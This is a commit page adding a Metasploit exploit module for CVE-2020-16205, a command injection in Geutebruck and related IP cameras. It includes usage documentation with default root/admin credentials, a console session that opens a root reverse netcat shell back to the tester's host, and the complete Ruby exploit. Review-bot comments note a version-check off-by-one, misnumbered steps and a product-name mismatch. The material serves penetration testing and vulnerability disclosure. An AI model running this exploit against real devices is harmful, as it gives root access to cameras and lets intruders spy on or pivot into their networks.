Land #13986, Add CVE-2020-16205 exploit for Geutebruck G-CAM
Showing 2 changed files with 191 additions and 0 deletions.
documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
@@ -0,0 +1,90 @@ | ||
## Vulnerable Application | ||
|
||
The following [Geutebruck](https://www.geutebrueck.com) products using firmware versions <= 1.12.0.25, | ||
firmware version 1.12.13.2 or firmware version 1.12.14.5: | ||
* Encoder and E2 Series Camera models: | ||
* G-Code: | ||
* EEC-2xxx | ||
* G-Cam: | ||
* EBC-21xx | ||
* EFD-22xx | ||
* ETHC-22xx | ||
* EWPC-22xx | ||
|
||
Many brands use the same firmware: | ||
* UDP Technology (which is also the supplier of the firmware for the other vendors) | ||
* Ganz | ||
* Visualint | ||
* Cap | ||
* THRIVE Intelligence | ||
* Sophus | ||
* VCA | ||
* TripCorps | ||
* Sprinx Technologies | ||
* Smartec | ||
* Riva | ||
|
||
This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5. | ||
|
||
### Description | ||
|
||
This module exploits an authenticated OS command injection vulnerability (CVE-2020-16205) within the | ||
`server` GET parameter of /uapi-cgi/admin/testaction.cgi when the `type` parameter is set to `ntp`. | ||
This issue occurs due to a lack of validation on the `server` parameter, which allows an attacker to | ||
inject a new line character, followed by the command they wish to execute, at which point the server will | ||
then interpret the new string as a separate command to be executed. Successful exploitation will result in | ||
remote code execution as the `root` user. | ||
|
||
Users can find additional details of this vulnerability on the advisory page at https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03. | ||
|
||
## Verification Steps | ||
|
||
1. Start the camera using default configuration | ||
2. Launch msfconsole | ||
3. Do: `use exploit/linux/http/geutebruck_testaction_exec` | ||
4. Do: `set httpusername <camera_username>` | ||
5. Do: `set httppassword <camera_password>` | ||
6. Do: `set lhost <metasploit_ip>` | ||
5. Do: `set rhosts <camera_ip>` | ||
6. Do: `set payload cmd/unix/reverse_netcat_gaping` | ||
7. Do: `check` to be sure the target is vulnerable | ||
8. Do: `exploit` | ||
9. You should get a shell | ||
|
||
## Options | ||
|
||
The default credentials to log on the web interface are root/admin. | ||
|
||
### HTTPUSERNAME | ||
A username used to authenticate on the admin page. **Default: root** | ||
|
||
### HTTPPASSWORD | ||
The password of the username used to authenticate on the admin page. **Default: admin** | ||
|
||
## Scenarios | ||
### Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5. | ||
``` | ||
msf5 > use exploit/linux/http/geutebruck_testaction_exec | ||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping | ||
payload => cmd/unix/reverse_netcat_gaping | ||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root | ||
httpusername => root | ||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin | ||
httppassword => admin | ||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1 | ||
lhost => 192.168.14.1 | ||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58 | ||
rhosts => 192.168.14.58 | ||
msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit | ||
[*] Started reverse TCP handler on 192.168.14.1:4444 | ||
[*] 192.168.14.58:80 - Attempting to exploit... | ||
[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2020-04-02 18:26:28 +0200 | ||
pwd | ||
/tmp/www_ramdisk/uapi-cgi/admin | ||
id | ||
uid=0(root) gid=0(root) | ||
uname -a | ||
Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-ge52275bd #1 PREEMPT Thu Jul 25 20:25:39 KST 2019 armv5tejl GNU/Linux | ||
``` |
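Review bot: the numbered list under `## Verification Steps` restarts at 5 right after step 6 (`set lhost <metasploit_ip>`), so `set rhosts` and `set payload` reuse numbers already taken and an eleven-entry list ends at "9. You should get a shell"; renumber the steps 1 through 11. The product list in this file places EEC-2xxx under G-Code and EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx under G-Cam, while the module description in the .rb file of this same commit says "G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ..."; one of the two is wrong and the docs and module should agree. Minor: since `## Options` states that `HTTPUSERNAME`/`HTTPPASSWORD` default to root/admin, the verification steps could say that steps 4 and 5 are only needed when the credentials were changed from the defaults.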
modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -0,0 +1,101 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::CmdStager | ||
prepend Msf::Exploit::Remote::AutoCheck | ||
|
||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'Geutebruck testaction.cgi Remote Command Execution', | ||
'Description' => %q{ | ||
This module exploits an authenticated arbitrary command execution vulnerability within the 'server' | ||
GET parameter of the /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, | ||
ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware | ||
versions 1.12.13.2 and 1.12.14.5 when the 'type' GET paramter is set to 'ntp'. | ||
Successful exploitation results in remote code execution as the root user. | ||
}, | ||
|
||
'Author' => | ||
[ | ||
'Davy Douhine' # ddouhine | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => | ||
[ | ||
[ 'CVE', '2020-16205' ], | ||
[ 'URL', 'http://geutebruck.com' ], | ||
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ], | ||
[ 'URL', 'https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/' ] | ||
], | ||
'DisclosureDate' => 'May 20 2020', | ||
'Privileged' => true, | ||
'Platform' => ['unix', 'linux'], | ||
'Arch' => [ARCH_ARMLE], | ||
'Targets' => [ | ||
[ 'Automatic Target', {} ] | ||
], | ||
'DefaultTarget' => 0, | ||
'DefaultOptions' => | ||
{ | ||
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' | ||
} | ||
) | ||
) | ||
|
||
register_options( | ||
[ | ||
OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]), | ||
OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]), | ||
OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']), | ||
] | ||
) | ||
end | ||
|
||
def firmware | ||
begin | ||
res = send_request_cgi( | ||
'method' => 'GET', | ||
'uri' => '/brand.xml' | ||
) | ||
unless res | ||
vprint_error 'Connection failed' | ||
return CheckCode::Unknown | ||
end | ||
|
||
res_xml = res.get_xml_document | ||
@version = res_xml.at('//firmware').text | ||
return true | ||
end | ||
end | ||
|
||
def check | ||
result = firmware | ||
return result unless result == true | ||
|
||
version = Gem::Version.new(@version) | ||
vprint_status "Found Geutebruck version #{version}" | ||
if version < Gem::Version.new('1.12.0.25') || version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5') | ||
return CheckCode::Appears | ||
end | ||
|
||
CheckCode::Safe | ||
end | ||
|
||
def exploit | ||
print_status("#{rhost}:#{rport} - Attempting to exploit...") | ||
send_request_cgi( | ||
{ | ||
'method' => 'GET', | ||
'uri' => target_uri.path, | ||
'vars_get' => { 'type' => 'ntp', 'server' => "\n#{payload.encoded}" } | ||
} | ||
) | ||
end | ||
end |
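Review bot: the version comparison in `check` uses `version < Gem::Version.new('1.12.0.25')`, which classifies firmware 1.12.0.25 itself as `CheckCode::Safe` although the description string and the documentation say versions `<= 1.12.0.25` are affected; change `<` to `<=`. In `firmware`, `res_xml.at('//firmware').text` raises `NoMethodError` when `/brand.xml` comes back without a `<firmware>` element (or is not XML at all), and the surrounding `begin` block has no `rescue`, so `check` aborts with a backtrace instead of returning `CheckCode::Unknown`; guard the nil, for example `node = res_xml.at('//firmware')` followed by `return CheckCode::Unknown unless node`, and also return `Unknown` when `res.code != 200`. `Gem::Version.new(@version)` raises `ArgumentError` on a malformed version string, so validate with `Gem::Version.correct?(@version)` first. The description says the vulnerable page is `/uapi-cgi/testaction.cgi` while `TARGETURI` defaults to `/uapi-cgi/admin/testaction.cgi`; fix the description and the typo `paramter`. `Msf::Exploit::CmdStager` is included but never used and can be dropped. Finally, `exploit` discards the result of `send_request_cgi`, so a failed authentication (for instance a 401 after a wrong `HttpPassword`) is never reported; capture the response and `fail_with` on `nil` or a non-200 code so the user sees why no session arrived.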